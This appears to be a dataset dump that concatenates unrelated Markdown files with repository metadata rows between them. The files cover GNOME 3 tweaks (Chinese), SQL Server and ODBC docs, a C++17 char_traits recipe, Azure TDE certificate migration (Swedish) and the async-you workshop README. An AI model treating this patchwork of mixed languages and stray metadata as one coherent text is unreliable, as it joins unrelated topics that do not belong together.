### 添加窗口按钮 ###
出于一些未知的原因,GNOME的开发者们决定对标准的窗口按钮(关闭,最小化,最大化)不屑一顾,而支持只有单个关闭按钮的窗口了。我缺少了最大化按钮(虽然你可以简单地拖动窗口到屏幕顶部来将它最大化),而且也可以通过在标题栏右击选择最小化或者最大化来进行最小化/最大化操作。这种变化仅仅增加了操作步骤,因此缺少最小化按钮实在搞得人云里雾里。所幸的是,有个简单的修复工具可以解决这个问题,下面说说怎样做吧:
默认情况下,你应该安装了GNOME优化工具(GNOME Tweak Tool)。通过该工具,你可以打开最大化或最小化按钮(图1)。
<center>
*图 1: 添加回最小化按钮到GNOME 3窗口*</center>
添加完后,你就可以看到最小化按钮了,它在关闭按钮的左边,等着为你服务呢。你的窗口现在管理起来更方便了。
同样在这个优化工具中,你也可以对GNOME进行大量其它有帮助的配置:
- 设置窗口聚焦模式
- 设置系统字体
- 设置GNOME主题
- 添加启动应用
- 添加扩展
### 添加扩展 ###
GNOME 3的最佳特性之一,就是shell扩展,这些扩展为GNOME带来了各种类别的有用特性。关于shell扩展,没必要从包管理器去安装。你可以访问[GNOME Shell扩展][2]站点,搜索你想要添加的扩展,点击扩展列表,点击打开按钮,然后扩展就安装完成了;或者你也可以从GNOME优化工具中添加它们(你在网站上会找到更多可用的扩展)。
注:你可能需要在浏览器中允许扩展安装。如果出现这样的情况,你会在第一次访问GNOME Shell扩展站点时见到警告信息。当出现提示时,只要点击允许即可。
令人印象更为深刻的(而又得心应手的)扩展之一,就是[Dash to Dock][3]。
该扩展将Dash移出应用程序概览,并将它转变为相当标准的停靠栏(图2)。
<center>
*图 2: Dash to Dock添加一个停靠栏到GNOME 3*</center>
当你添加应用程序到Dash后,他们也将被添加到Dash to Dock。你也可以通过点击Dock底部的6点图标访问应用程序概览。
还有大量其它扩展致力于将GNOME 3打造成一个更为高效的桌面,在这些不错的扩展中,包括以下这些:
- [最近项目][4]: 添加一个最近使用项目的下拉菜单到面板。
- [Firefox书签搜索][5]: 从概览搜索(并启动)书签。
- [跳转列表][6]: 添加一个跳转列表弹出菜单到Dash图标(该扩展可以让你快速打开和程序关联的新文档,甚至更多)
- [待办列表][7]: 添加一个下拉列表到面板,它允许你添加项目到该列表。
- [网页搜索框][8]: 允许你通过敲击Ctrl+空格来快速搜索网页并输入一个文本字符串(结果在新的浏览器标签页中显示)。
### 添加一个完整停靠栏 ###
如果Dash to dock对于你而言功能还是太有限(你想要“通知区域”,甚至更多),那么向你推荐我最喜爱的停靠栏之一[Cairo Dock][9](图3)。
<center>
*图 3: Cairo Dock待命*</center>
在将Cairo Dock添加到GNOME 3后,你的体验将成倍地增长。从你的发行版的包管理器中安装这个优秀的停靠栏吧。
不要将GNOME 3看作是一个效率不高的,用户不友好的桌面。只要稍作调整,GNOME 3可以成为和其它可用的桌面一样强大而用户友好的桌面。
--------------------------------------------------------------------------------
via: http://www.linux.com/learn/tutorials/781916-easy-steps-to-make-gnome-3-more-efficient
作者:[Jack Wallen][a]
译者:[GOLinux](https://github.com/GOLinux)
校对:[ wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
[a]:http://www.linux.com/community/forums/person/93
[1]:http://ubuntugnome.org/
[2]:https://extensions.gnome.org/
[3]:https://extensions.gnome.org/extension/307/dash-to-dock/
[4]:https://extensions.gnome.org/extension/72/recent-items/
[5]:https://extensions.gnome.org/extension/149/search-firefox-bookmarks-provider/
[6]:https://extensions.gnome.org/extension/322/quicklists/
[7]:https://extensions.gnome.org/extension/162/todo-list/
[8]:https://extensions.gnome.org/extension/549/web-search-dialog/
[9]:http://glx-dock.org/index.php
| 37.6 | 199 | 0.751564 | yue_Hant | 0.941381 |
6100f90a7feedd69472869b6b996efc4924188bc | 364 | md | Markdown | _projects/[5]Discount Mart Sales Analytics.md | Ghaiyur/ghaiyur.github.io | 0d401e528fd17fb7a060e91bfc5be0b226aec079 | [
"MIT"
] | null | null | null | _projects/[5]Discount Mart Sales Analytics.md | Ghaiyur/ghaiyur.github.io | 0d401e528fd17fb7a060e91bfc5be0b226aec079 | [
"MIT"
] | null | null | null | _projects/[5]Discount Mart Sales Analytics.md | Ghaiyur/ghaiyur.github.io | 0d401e528fd17fb7a060e91bfc5be0b226aec079 | [
"MIT"
] | null | null | null | ---
name: Discount Mart Sales Analytics
tools: [Tableau, Data Analytics, Sales, Product Monitoring, Dashboard]
image:
description: A Dashboard that helps track a SupMarket's Sales , Profits and Inventory.
external_url: https://public.tableau.com/views/DiscountMartSalesAnalytics_16251963203240/Dashboard?:language=en-US&:display_count=n&:origin=viz_share_link
---
| 45.5 | 154 | 0.81044 | yue_Hant | 0.283619 |
610114e734bbd1a7a7e953be460681d845d6c733 | 2,611 | md | Markdown | docs/relational-databases/tables/getting-started-with-system-versioned-temporal-tables.md | hueifeng/sql-docs.zh-cn | 2b625532ea292d91157cc4485dcdfc079cd2bc49 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/relational-databases/tables/getting-started-with-system-versioned-temporal-tables.md | hueifeng/sql-docs.zh-cn | 2b625532ea292d91157cc4485dcdfc079cd2bc49 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/relational-databases/tables/getting-started-with-system-versioned-temporal-tables.md | hueifeng/sql-docs.zh-cn | 2b625532ea292d91157cc4485dcdfc079cd2bc49 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 系统版本控制临时表入门 | Microsoft Docs
ms.custom: ''
ms.date: 03/28/2016
ms.prod: sql
ms.prod_service: database-engine, sql-database
ms.reviewer: ''
ms.technology: table-view-index
ms.topic: conceptual
ms.assetid: d431f216-82cf-4d97-825e-bb35d3d53a45
author: CarlRabeler
ms.author: carlrab
monikerRange: =azuresqldb-current||>=sql-server-2016||=sqlallproducts-allversions||>=sql-server-linux-2017||=azuresqldb-mi-current
ms.openlocfilehash: a87f79468344173034655a06ae87d33aa2931b9d
ms.sourcegitcommit: b57d98e9b2444348f95c83a24b8eea0e6c9da58d
ms.translationtype: HT
ms.contentlocale: zh-CN
ms.lasthandoff: 07/21/2020
ms.locfileid: "86552705"
---
# <a name="getting-started-with-system-versioned-temporal-tables"></a>由系统控制版本的时态表入门
[!INCLUDE [sqlserver2016-asdb-asdbmi](../../includes/applies-to-version/sqlserver2016-asdb-asdbmi.md)]
根据你的方案,你可以创建新的系统版本控制临时表,或通过将临时属性添加到现有的表架构修改现有的系统版本控制临时表。 修改临时表中的数据时,系统将生成对应用程序和最终用户透明的版本历史记录。 因此,使用系统版本控制临时表时,不需要对修改表或查询最新(实际)状态的数据的方式进行任何更改。
除了常规的 DML 和查询,临时表还提供了简单方便的方法来让你通过扩展的 Transact-SQL 语法从数据历史记录中获得见解。 每个系统版本控制表都分配有一个历史记录表,但该表对用户完全透明,除非他们想要通过创建附加索引或选择不同的存储选项来优化工作负载性能或存储空间。
下图说明了使用由系统控制版本的时态表的典型工作流:
本主题分为以下 5 个子主题:
- [创建由系统控制版本的临时表](../../relational-databases/tables/creating-a-system-versioned-temporal-table.md)
- [在系统版本控制的临时表中修改数据](../../relational-databases/tables/modifying-data-in-a-system-versioned-temporal-table.md)
- [在系统版本控制临时表中查询数据](../../relational-databases/tables/querying-data-in-a-system-versioned-temporal-table.md)
- [更改系统版本控制的临时表架构](../../relational-databases/tables/changing-the-schema-of-a-system-versioned-temporal-table.md)
- [停止对系统版本的临时表的系统版本控制](../../relational-databases/tables/stopping-system-versioning-on-a-system-versioned-temporal-table.md)
## <a name="next-steps"></a>后续步骤
- [临时表](../../relational-databases/tables/temporal-tables.md)
- [临时表系统一致性检查](../../relational-databases/tables/temporal-table-system-consistency-checks.md)
- [临时表分区](../../relational-databases/tables/partitioning-with-temporal-tables.md)
- [临时表注意事项和限制](../../relational-databases/tables/temporal-table-considerations-and-limitations.md)
- [临时表安全性](../../relational-databases/tables/temporal-table-security.md)
- [管理版本由系统控制的临时表中历史数据的保留期](../../relational-databases/tables/manage-retention-of-historical-data-in-system-versioned-temporal-tables.md)
- [系统版本控制临时表与内存优化表](../../relational-databases/tables/system-versioned-temporal-tables-with-memory-optimized-tables.md)
- [临时表元数据视图和函数](../../relational-databases/tables/temporal-table-metadata-views-and-functions.md)
| 53.285714 | 141 | 0.795481 | yue_Hant | 0.331392 |
61011d57b0a064ce498330518e40faba04ba26e2 | 2,307 | md | Markdown | docs/odbc/microsoft/installing-the-software-odbc.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-07-05T14:10:29.000Z | 2019-07-05T14:10:29.000Z | docs/odbc/microsoft/installing-the-software-odbc.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/odbc/microsoft/installing-the-software-odbc.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-16T00:08:14.000Z | 2019-09-16T00:08:14.000Z | ---
title: "Installing the Software (ODBC) | Microsoft Docs"
ms.custom: ""
ms.date: "01/19/2017"
ms.prod: "sql-non-specified"
ms.prod_service: "drivers"
ms.service: ""
ms.component: "odbc"
ms.reviewer: ""
ms.suite: "sql"
ms.technology:
- "drivers"
ms.tgt_pltfrm: ""
ms.topic: "article"
helpviewer_keywords:
- "ODBC driver for Oracle [ODBC], installing"
- "installing ODBC driver for Oracle [ODBC]"
ms.assetid: dfac8ade-eebe-4ebe-a199-feb740ed5bae
caps.latest.revision: 12
author: "MightyPen"
ms.author: "genemi"
manager: "jhubbard"
ms.workload: "Inactive"
---
# Installing the Software (ODBC)
> [!IMPORTANT]
> This feature will be removed in a future version of Windows. Avoid using this feature in new development work, and plan to modify applications that currently use this feature. Instead, use the ODBC driver provided by Oracle.
The ODBC Driver for Oracle is one of the data access components. It accompanies other ODBC components, such as the ODBC Data Source Administrator, and should already be installed. The driver also can be found under "Drivers and Other Downloads" on the Microsoft Product Support Services Online Web site at www.microsoft.com.
Network software must be installed according to its own documentation. The ODBC Driver for Oracle requires no special installation considerations as long as the network software is supported.
Oracle software must be installed according to its own documentation. The ODBC Driver for Oracle generally requires no special installation considerations as long as the driver supports the version. However, to keep products compatible, install the ODBC Driver for Oracle last to ensure you have the latest version of the driver. Oracle maintains a public FTP site where it posts, among other things, patches to the Oracle server products and the client component that ships with the server products. These patches are required for the proper functioning of several Microsoft products and technologies. For more information about this site, see [Oracle Software Patches](../../odbc/microsoft/oracle-software-patches.md).
> [!CAUTION]
> Installing Oracle software over MDAC/Windows DAC may overwrite current versions of MDAC. If problems arise using ODBC components, reinstall MDAC.
| 62.351351 | 724 | 0.766797 | eng_Latn | 0.991222 |
610225cdb51801cb82164334d194baee66f4dbef | 5,878 | md | Markdown | content/chapter7/chapter7-11-chinese.md | Zoupers/CPP-17-STL-cookbook | f047533cb7e87acb5f33168895a2b0f6834f20a8 | [
"Apache-2.0"
] | 873 | 2018-03-28T05:41:28.000Z | 2022-03-30T02:18:50.000Z | content/chapter7/chapter7-11-chinese.md | mapleFU/CPP-17-STL-cookbook | c827a95e67a61edfa24a8b1f048a0bc7578c1aaf | [
"Apache-2.0"
] | 6 | 2018-05-16T15:13:04.000Z | 2021-01-15T02:39:44.000Z | content/chapter7/chapter7-11-chinese.md | mapleFU/CPP-17-STL-cookbook | c827a95e67a61edfa24a8b1f048a0bc7578c1aaf | [
"Apache-2.0"
] | 209 | 2018-04-05T14:26:13.000Z | 2022-03-27T08:45:25.000Z | # 通过集成std::char_traits创建自定义字符串类
我们知道`std::string`非常好用。不过,对于一些朋友来说他们需要对自己定义的字符串类型进行处理。
使用它们自己的字符串类型显然不是一个好主意,因为对于字符串的安全处理是很困难的。幸运的是,`std::string`是`std::basic_string`类型的一个特化版本。这个类中包含了所有复杂的内存处理,不过其对字符串的拷贝和比较没有添加任何条件。所以我们可以基于`basic_string`,将其所需要包含的自定义类作为一个模板参数传入。
本节中,我们将来看下如何传入自定义类型。然后,在不实现任何东西的情况下,如何对自定义字符串进行创建。
## How to do it...
我们将实现两个自定义字符串类:`lc_string`和`ci_string`。第一个类将通过输入创建一个全是小写字母的字符串。另一个字符串类型不会对输入进行任何变化,不过其会对字符串进行大小写不敏感的比较:
1. 包含必要的头文件,并声明所使用的命名空间:
```c++
#include <iostream>
#include <algorithm>
#include <string>
using namespace std;
```
2. 然后要对`std::tolower`函数进行实现,其已经定义在头文件`<cctype>`中。其函数也是现成的,不过其不是`constexpr`类型。C++17中一些`string`函数可以声明成`constexpr`类型,但是还要使用自定义的类型。所以对于输入字符串,只将大写字母转换为小写,而其他字符则不进行修改:
```c++
static constexpr char tolow(char c) {
switch (c) {
case 'A'...'Z': return c - 'A' + 'a'; // 读者自行将case展开
default: return c;
}
}
```
3. `std::basic_string`类可以接受三个模板参数:字符类型、字符特化类和分配器类型。本节中我们只会修改字符特化类,因为其定义了字符串的行为。为了重新实现与普通字符串不同的部分,我们会以`public`方式继承标准字符特化类:
```c++
class lc_traits : public char_traits<char> {
public:
```
4. 我们类能接受输入字符串,并将其转化成小写字母。这里有一个函数,其是字符级别的,所以我们可以对其使用`tolow`函数。我们的这个函数为`constexpr`:
```c++
static constexpr
void assign(char_type& r, const char_type& a ) {
r = tolow(a);
}
```
5. 另一个函数将整个字符串拷贝到我们的缓冲区内。使用`std::transform`将所有字符从源字符串中拷贝到内部的目标字符串中,同时将每个字符与其小写版本进行映射:
```c++
static char_type* copy(char_type* dest,
const char_type* src,
size_t count) {
transform(src, src + count, dest, tolow);
return dest;
}
};
```
6. 上面的特化类可以帮助我们创建一个字符串类,其能有效的将字符串转换成小写。接下来我们在实现一个类,其不会对原始字符串进行修改,但是其能对字符串做大小写敏感的比较。其继承于标准字符串特征类,这次将对一些函数进行重新实现:
```c++
class ci_traits : public char_traits<char> {
public:
```
7. `eq`函数会告诉我们两个字符是否相等。我们也会实现一个这样的函数,但是我们只实现小写字母的版本。这样'A'与'a'就是相等的:
```c++
static constexpr bool eq(char_type a, char_type b) {
return tolow(a) == tolow(b);
}
```
8. `lt`函数会告诉我们两个字符在字母表中的大小情况。这里使用了逻辑操作符,并继续对两个字符使用转换成小写的函数:
```c++
static constexpr bool lt(char_type a, char_type b) {
return tolow(a) < tolow(b);
}
```
9. 最后两个函数都是字符级别的函数,接下来两个函数都为字符串级别的函数。`compare`函数与`strncmp`函数差不多。当两个字符串的长度`count`相等,那么就返回0。如果不相等,会返回一个负数或一个正数,返回值就代表了其中哪一个在字母表中更小。并计算两个字符串中所有字符之间的距离,当然这些都是在小写情况下进行的操作。C++14后,这个函数可以声明成`constexpr`类型:
```c++
static constexpr int compare(const char_type* s1,
const char_type* s2,
size_t count) {
for (; count; ++s1, ++s2, --count) {
const char_type diff (tolow(*s1) - tolow(*s2));
if (diff < 0) { return -1; }
else if (diff > 0) { return +1; }
}
return 0;
}
```
10. 我们所需要实现的最后一个函数就是大小写不敏感的`find`函数。对于给定输入字符串`p`,其长度为`count`,我们会对某个字符`ch`的位置进行查找。然后,其会返回一个指向第一个匹配字符位置的指针,如果没有找到则返回`nullptr`。这个函数比较过程中我们需要使用`tolow`函数将字符串转换成小写,以匹配大小写不敏感的查找。不幸的是,我们不能使用`std::find_if`来做这件事,因为其是非`constexpr`函数,所以我们需要自己去写一个循环:
```c++
static constexpr
const char_type* find(const char_type* p,
size_t count,
const char_type& ch) {
const char_type find_c {tolow(ch)};
for (; count != 0; --count, ++p) {
if (find_c == tolow(*p)) { return p; }
}
return nullptr;
}
};
```
11. OK,所有自定义类都完成了。这里我们可以定义两种新字符串类的类型。`lc_string`代表小写字符串,`ci_string`代表大小写不敏感字符串。这两种类型与`std::string`都有所不同:
```c++
using lc_string = basic_string<char, lc_traits>;
using ci_string = basic_string<char, ci_traits>;
```
12. 为了能让输出流接受新类,我们需要对输出流操作符进行重载:
```c++
ostream& operator<<(ostream& os, const lc_string& str) {
return os.write(str.data(), str.size());
}
ostream& operator<<(ostream& os, const ci_string& str) {
return os.write(str.data(), str.size());
}
```
13. 现在我们来对主函数进行编写。先让我们创建一个普通字符串、小写字符串和大小写不敏感字符串的实例,然后直接将其进行打印。其在终端上看起来都很正常,不过小写字符串将所有字符转换成了小写:
```c++
int main()
{
cout << " string: "
<< string{"Foo Bar Baz"} << '\n'
<< "lc_string: "
<< lc_string{"Foo Bar Baz"} << '\n'
<< "ci_string: "
<< ci_string{"Foo Bar Baz"} << '\n';
```
14. 为了测试大小写不敏感字符串,可以实例化两个字符串,这两个字符串只有在大小写方面有所不同。当我们将这两个字符串进行比较时,其应该是相等的:
```c++
ci_string user_input {"MaGiC PaSsWoRd!"};
ci_string password {"magic password!"};
```
15. 之后,对其进行比较,然后将匹配的结果进行打印:
```c++
if (user_input == password) {
cout << "Passwords match: \"" << user_input
<< "\" == \"" << password << "\"\n";
}
}
```
16. 编译并运行程序,其输出和我们期望的相符。开始的三行并未对输入进行修改,除了`lc_string`将所有字符转换成了小写。最后的比较,在大小写不敏感的前提下,也是相等的:
```c++
$ ./custom_string
string: Foo Bar Baz
lc_string: foo bar baz
ci_string: Foo Bar Baz
Passwords match: "MaGiC PaSsWoRd!" == "magic password!"
```
## How it works...
我们完成的所有子类和函数实现,在新手看来十分的不可思议。这些函数签名都来自于哪里?为什么我们为了函数签名,就要对相关功能性的函数进行重新实现呢?
首先,来看一下`std::string`的类声明:
```c++
template <
class CharT,
class Traits = std::char_traits<CharT>,
class Allocator = std::allocator<CharT>
>
class basic_string;
```
可以看出`std::string`其实就是一个`std::basic_string<char>` 类,并且其可以扩展为`std::basic_string<char, std::char_traits<char>, std::allocator<char>> `。OK,这是一个非常长的类型描述,不过其意义何在呢?这就表示字符串可以不限于有符号类型`char`,也可以是其他类型。其对于字符串类型都是有效的,这样就不限于处理ASCII字符集。当然,这不是我们的关注点。
` char_traits<char>`类包含`basic_string`所需要的算法。` char_traits<char>`可以进行字符串间的比较、查找和拷贝。
`allocator<char>`类也是一个特化类,不过其运行时给字符串进行空间的分配和回收。这对于现在的我们来说并不重要,我们只使用其默认的方式就好。
当我们想要一个不同的字符串类型是,可以尝试对`basic_string`和`char_traits`类中提供的方法进行复用。我们实现了两个`char_traits`子类:`case_insentitive`和`lower_caser`类。我们可以将这两个字符串类替换标准`char_traits`类型。
> Note:
>
> 为了探寻`basic_string`适配的可能性,我们需要查询C++ STL文档中关于`std::char_traits`的章节,然后去了解还有那些函数需要重新实现。 | 29.243781 | 236 | 0.646819 | yue_Hant | 0.22293 |
61025805088ad6b8dece89016215317a041ca3a6 | 9,565 | md | Markdown | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Migrera TDE-certifikat – hanterad instans
description: Migrera ett certifikat som skyddar databas krypterings nyckeln för en databas med transparent datakryptering till Azure SQL-hanterad instans
services: sql-database
ms.service: sql-managed-instance
ms.subservice: security
ms.custom: sqldbrb=1, devx-track-azurecli
ms.devlang: ''
ms.topic: how-to
author: MladjoA
ms.author: mlandzic
ms.reviewer: sstein, jovanpop
ms.date: 07/21/2020
ms.openlocfilehash: 80ff16156348db9c3a209757b48b7d54615d9104
ms.sourcegitcommit: 400f473e8aa6301539179d4b320ffbe7dfae42fe
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 10/28/2020
ms.locfileid: "92790703"
---
# <a name="migrate-a-certificate-of-a-tde-protected-database-to-azure-sql-managed-instance"></a>Migrera ett certifikat för en TDE-skyddad databas till en Azure SQL-hanterad instans
[!INCLUDE[appliesto-sqlmi](../includes/appliesto-sqlmi.md)]
När du migrerar en databas som skyddas av [Transparent datakryptering (TDE)](/sql/relational-databases/security/encryption/transparent-data-encryption) till en Azure SQL-hanterad instans med hjälp av det interna återställnings alternativet måste motsvarande certifikat från SQL Server-instansen migreras innan databasen återställs. Den här artikeln vägleder dig genom processen för manuell migrering av certifikatet till den Azure SQL-hanterade instansen:
> [!div class="checklist"]
>
> * Exportera certifikatet till en personlig information Exchange-fil (. pfx)
> * Extrahera certifikatet från en fil till en Base-64-sträng
> * Ladda upp den med en PowerShell-cmdlet
Ett alternativt alternativ som använder en fullständigt hanterad tjänst för sömlös migrering av både en TDE-skyddad databas och ett motsvarande certifikat finns i [så här migrerar du din lokala databas till Azure SQL-hanterad instans med hjälp av Azure Database migration service](../../dms/tutorial-sql-server-to-managed-instance.md).
> [!IMPORTANT]
> Ett migrerat certifikat används endast för återställning av den TDE-skyddade databasen. Snart när återställningen är färdig ersätts det migrerade certifikatet av ett annat skydd, antingen ett tjänst hanterat certifikat eller en asymmetrisk nyckel från nyckel valvet, beroende på vilken typ av TDE som du har angett på instansen.
## <a name="prerequisites"></a>Förutsättningar
Du behöver följande för att slutföra stegen i den här artikeln:
* [Pvk2Pfx](/windows-hardware/drivers/devtest/pvk2pfx)-kommandoradsverktyget installerat på den lokala servern eller en annan dator med åtkomst till det certifikat som exporterats som en fil. Verktyget Pvk2Pfx är en del av [Enterprise Windows Driver Kit](/windows-hardware/drivers/download-the-wdk), en fristående kommando rads miljö.
* [Windows PowerShell](/powershell/scripting/install/installing-windows-powershell) version 5.0 eller senare installerat.
# <a name="powershell"></a>[PowerShell](#tab/azure-powershell)
Se till att du har följande:
* Azure PowerShell-modulen [installeras och uppdateras](/powershell/azure/install-az-ps).
* [AZ. SQL-modul](https://www.powershellgallery.com/packages/Az.Sql).
[!INCLUDE [updated-for-az](../../../includes/updated-for-az.md)]
> [!IMPORTANT]
> PowerShell Azure Resource Manager-modulen stöds fortfarande av Azure SQL-hanterad instans, men all framtida utveckling gäller AZ. SQL-modulen. De här cmdletarna finns i [AzureRM. SQL](/powershell/module/AzureRM.Sql/). Argumenten för kommandona i AZ-modulen och i AzureRM-modulerna är i stort sett identiska.
Kör följande kommandon i PowerShell för att installera/uppdatera modulen:
```azurepowershell
Install-Module -Name Az.Sql
Update-Module -Name Az.Sql
```
# <a name="azure-cli"></a>[Azure CLI](#tab/azure-cli)
Om du behöver installera eller uppgradera kan du läsa informationen i [Installera Azure CLI](/cli/azure/install-azure-cli).
* * *
## <a name="export-the-tde-certificate-to-a-pfx-file"></a>Exportera TDE-certifikatet till en PFX-fil
Certifikatet kan exporteras direkt från käll SQL Servers instansen eller från certifikat arkivet om det finns där.
### <a name="export-the-certificate-from-the-source-sql-server-instance"></a>Exportera certifikatet från käll SQL Servers instansen
Använd följande steg för att exportera certifikatet med SQL Server Management Studio och konvertera det till. PFX-format. De generiska namnen *TDE_Cert* och *full_path* används för certifikat-och fil namn och sökvägar genom stegen. De ska ersättas med de faktiska namnen.
1. Öppna ett nytt frågefönster i SSMS och Anslut till käll SQL Servers instansen.
1. Använd följande skript för att visa en lista över TDE-skyddade databaser och hämta namnet på certifikatet som skyddar krypteringen av databasen som ska migreras:
```sql
USE master
GO
SELECT db.name as [database_name], cer.name as [certificate_name]
FROM sys.dm_database_encryption_keys dek
LEFT JOIN sys.certificates cer
ON dek.encryptor_thumbprint = cer.thumbprint
INNER JOIN sys.databases db
ON dek.database_id = db.database_id
WHERE dek.encryption_state = 3
```

1. Kör följande skript för att exportera certifikatet till ett par filer (.cer och .pvk) med informationen för den offentliga nyckeln och den privata nyckeln:
```sql
USE master
GO
BACKUP CERTIFICATE TDE_Cert
TO FILE = 'c:\full_path\TDE_Cert.cer'
WITH PRIVATE KEY (
FILE = 'c:\full_path\TDE_Cert.pvk',
ENCRYPTION BY PASSWORD = '<SomeStrongPassword>'
)
```

1. Använd PowerShell-konsolen för att kopiera certifikat information från ett par med nyligen skapade filer till en. pfx-fil med hjälp av Pvk2Pfx-verktyget:
```cmd
.\pvk2pfx -pvk c:/full_path/TDE_Cert.pvk -pi "<SomeStrongPassword>" -spc c:/full_path/TDE_Cert.cer -pfx c:/full_path/TDE_Cert.pfx
```
### <a name="export-the-certificate-from-a-certificate-store"></a>Exportera certifikatet från ett certifikat Arkiv
Om certifikatet sparas i den SQL Server lokala datorns certifikat Arkiv, kan det exporteras med följande steg:
1. Öppna PowerShell-konsolen och kör följande kommando för att öppna snapin-modulen certifikat i Microsoft Management Console:
```cmd
certlm
```
2. I MMC-snapin-modulen certifikat expanderar du sökvägen personliga > certifikat för att se listan över certifikat.
3. Högerklicka på certifikatet och klicka på **Exportera** .
4. Följ guiden för att exportera certifikatet och den privata nyckeln till ett. PFX-format.
## <a name="upload-the-certificate-to-azure-sql-managed-instance-using-an-azure-powershell-cmdlet"></a>Överför certifikatet till den Azure SQL-hanterade instansen med hjälp av en Azure PowerShell-cmdlet
# <a name="powershell"></a>[PowerShell](#tab/azure-powershell)
1. Börja med förberedelsestegen i PowerShell:
```azurepowershell
# import the module into the PowerShell session
Import-Module Az
# connect to Azure with an interactive dialog for sign-in
Connect-AzAccount
# list subscriptions available and copy id of the subscription target the managed instance belongs to
Get-AzSubscription
# set subscription for the session
Select-AzSubscription <subscriptionId>
```
2. När alla förberedelse steg har utförts kör du följande kommandon för att ladda upp det Base-64-kodade certifikatet till den hanterade mål instansen:
```azurepowershell
$fileContentBytes = Get-Content 'C:/full_path/TDE_Cert.pfx' -AsByteStream
$base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes)
$securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force
$password = "<password>"
$securePassword = $password | ConvertTo-SecureString -AsPlainText -Force
Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" `
-ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword
```
# <a name="azure-cli"></a>[Azure CLI](#tab/azure-cli)
Du måste först [Konfigurera ett Azure Key Vault](../../key-vault/general/manage-with-cli2.md) med din *. pfx* -fil.
1. Börja med förberedelsestegen i PowerShell:
```azurecli
# connect to Azure with an interactive dialog for sign-in
az login
# list subscriptions available and copy id of the subscription target the managed instance belongs to
az account list
# set subscription for the session
az account set --subscription <subscriptionId>
```
1. När alla förberedelse steg har utförts kör du följande kommandon för att ladda upp det grundläggande 64-kodade certifikatet till den hanterade mål instansen:
```azurecli
az sql mi tde-key set --server-key-type AzureKeyVault --kid "<keyVaultId>" `
--managed-instance "<managedInstanceName>" --resource-group "<resourceGroupName>"
```
* * *
Certifikatet är nu tillgängligt för den angivna hanterade instansen och säkerhets kopieringen av motsvarande TDE-skyddade databas kan återställas.
## <a name="next-steps"></a>Nästa steg
I den här artikeln har du lärt dig hur du migrerar ett certifikat som skyddar krypterings nyckeln för en databas med transparent datakryptering, från den lokala eller IaaS SQL Server-instansen till en Azure SQL-hanterad instans.
Se [återställa en databas säkerhets kopia till en hanterad Azure SQL-instans](restore-sample-database-quickstart.md) för att lära dig hur du återställer en databas säkerhets kopia till en Azure SQL-hanterad instans. | 49.559585 | 455 | 0.778986 | swe_Latn | 0.983008 |
610277342e3318934f7397f4e5e056acf11f1633 | 2,946 | md | Markdown | README.md | lexiconPDX/async-toi | 98240ca058ff0606e1e95e1f9f2e992178bf29c2 | [
"MIT"
] | null | null | null | README.md | lexiconPDX/async-toi | 98240ca058ff0606e1e95e1f9f2e992178bf29c2 | [
"MIT"
] | null | null | null | README.md | lexiconPDX/async-toi | 98240ca058ff0606e1e95e1f9f2e992178bf29c2 | [
"MIT"
] | null | null | null | # async-you
# Async Workshop
This workshop has you implement various asynchronous utility functions.
* [Parallel](https://caolan.github.io/async/v3/docs.html#parallel)
* [map](https://caolan.github.io/async/v3/docs.html#map)
* [waterfall](https://caolan.github.io/async/v3/docs.html#waterfall)
To complete the workshop, simply fill out the functions in `src/async.js` such that the tests in `spec/async-spec.js` all pass.
You may have CORS issues when trying to run the specs. To get around this, you need to create a server that can serve the files.
In the root directory of the project run one of the following commands:
For python 2, run `python -m SimpleHTTPServer`
For python 3, run `python -m http.server`
Now in your browser, go to `http://localhost:8000/SpecRunner.html?random=false` to run the tests.
Note, your python server may use a different port, for example port 8080 instead of 8000. Adjust the url above so it uses the correct port.
**I see you**
[](https://nodei.co/npm/async-you/) [](https://nodei.co/npm/async-you/)
## Introduction
Learn to use the popular package [async](https://github.com/caolan/async) via this interactive workshop.
Hopefully by the end this workshop you will understand the main functions that _async_ provides.
## Installation
1. Install [Node.js](http://nodejs.org/)
2. Run `npm install async`
3. Run `npm install async-you -g` , use `sudo` if you have permissions issues.
4. Run `async-you` to start the program!
## Usage
#### 1. Selecting a problem to work on
Once the workshop is installed, run `async-you` to print a menu
where you can select a problem to work on.
```
$ async-you
```
Problems are listed in rough order of difficulty. You are advised to complete them in order, as later problems
will build on skills developed by solving previous problems.
#### 2. Writing your solution
Once you have selected a problem, the workshop will remember which problem you are working on.
Using your preferred editor, simply create a file to write your solution in.
#### 3. Testing your solution
Use the workshop's `run` command to point the workshop at your solution file. Your solution will loaded
and passed the problem input. This usually won't perform any validation, it will only show the program output.
```
$ async-you run mysolution.js
```
#### 4. Verifying your solution
Your solution will be verified against the output of the 'official' solution.
If all of the output matches, then you have successfully solved the problem!
```
$ async-you verify mysolution.js
```
## Stuck?
Feedback and criticism is welcome, please log your troubles in [issues](https://github.com/bulkan/async-you).
## Resources
